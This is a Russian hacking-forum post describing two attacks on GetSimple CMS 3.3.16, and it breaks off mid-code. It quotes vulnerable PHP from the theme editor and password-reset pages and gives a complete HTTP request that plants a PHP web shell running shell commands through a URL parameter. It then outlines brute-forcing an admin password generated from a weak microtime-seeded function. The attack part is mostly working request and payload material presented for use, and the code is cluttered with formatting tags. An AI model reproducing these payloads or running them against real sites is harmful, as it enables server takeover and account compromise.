Форум АНТИЧАТ

Сайт - get-simple.info

Версия 3.3.16

RCE

Зависимости:

-- доступ в админ панель

Легальная возможность редактирования php файлов шаблонов, создания новых файлов.

Можно внедрить наш бэкдор в используемый файл шаблона или залить свой скрипт.

admin/theme-edit.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if((isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'submitsave'[/COLOR][COLOR="#007700"]]))){
 
[/COLOR][COLOR="#FF8000"]# check for csrf
[/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GSNOCSRF'[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]GSNOCSRF[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"]) ) {
[/COLOR][COLOR="#0000BB"]$nonce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'nonce'[/COLOR][COLOR="#007700"]];
       if(![/COLOR][COLOR="#0000BB"]check_nonce[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$nonce[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"save"[/COLOR][COLOR="#007700"])) {
           die([/COLOR][COLOR="#DD0000"]"CSRF detected!"[/COLOR][COLOR="#007700"]);
       }
   }
 
[/COLOR][COLOR="#FF8000"]# save edited template file
[/COLOR][COLOR="#0000BB"]$SavedFile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edited_file'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$FileContents[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]() ?[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]]) :[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]]; 
[/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]GSTHEMESPATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$SavedFile[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"can't open file"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$FileContents[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fh[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$success[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'TEMPLATE_FILE'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$SavedFile[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]

Запрос:

Код:

Code:

POST /admin/theme-edit.php?t=Innovation&f=template.php HTTP/1.1

Host: getsimple.localhost.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://getsimple.localhost.com/admin/theme-edit.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 163

DNT: 1

Connection: close

Cookie: PHPSESSID=9l7pual53vbi1opd9meggoc27a; GS_ADMIN_USERNAME=admin; 5a061daedaddfec9e0820c8dce27a6de1c13955d=116ff4110b64f75d4aff43dc1e8d03994ca2205c

Upgrade-Insecure-Requests: 1

Sec-GPC: 1



nonce=d6905d38e91254022db24285cdd5598b82a0376f&content=%3C%3Fphp+echo+shell_exec($_GET['a']);+%3F%3E&edited_file=Innovation%2Ftemplate1.php&submitsave=Save+Changes

Код:

Code:

http://getsimple.localhost.com/theme/Innovation/template1.php?a=ls

Auth bypass

Зависимости:

-- Необходимо знать/угадать логин админа

Восстанавливаем пароль -> брутим его. Пароль будет всегда в нашем списке из 1кк.

Более подробно - /threads/483845/

Уязвимый код:

admin/resetpassword.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$USR[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]# create new random password
[/COLOR][COLOR="#0000BB"]$random[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]createRandomPassword[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]// $random = '1234';
             
               # create backup
[/COLOR][COLOR="#0000BB"]createBak[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]GSUSERSPATH[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]GSBACKUSERSPATH[/COLOR][COLOR="#007700"]);
             
[/COLOR][COLOR="#FF8000"]# create password change trigger file
[/COLOR][COLOR="#0000BB"]$flagfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]GSUSERSPATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$USR[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]".xml.reset"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]GSUSERSPATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$flagfile[/COLOR][COLOR="#007700"]);
             
[/COLOR][COLOR="#FF8000"]# change password and resave xml file
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]PWD[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]passhash[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$random[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]XMLsave[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]GSUSERSPATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);
             
[/COLOR][COLOR="#FF8000"]# send the email with the new password
[/COLOR][COLOR="#0000BB"]$subject[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$site_full_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'RESET_PASSWORD'[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ATTEMPT'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$SITENAME[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'RESET_PASSWORD'[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ATTEMPT'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'LABEL_USERNAME'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]": "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$USR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'NEW_PASSWORD'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]": "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$random[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]i18n_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'EMAIL_LOGIN'[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]': '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$SITEURL[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GSADMIN[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]exec_action[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'resetpw-success'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sendmail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$EMAIL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$subject[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]

admin/inc/template_functions.php

[PHP]
PHP:
[COLOR="#000000"]functioncreateRandomPassword() {
$chars="Ayz23mFGHBxPQefgnopRScdqrTU4CXYZabstuDEhijkIJKMNV Wvw56789";
srand((double)microtime()*1000000);
$i=0;
$pass='';
while ($i[COLOR="#007700"]

Снаружи все это выглядит вот так: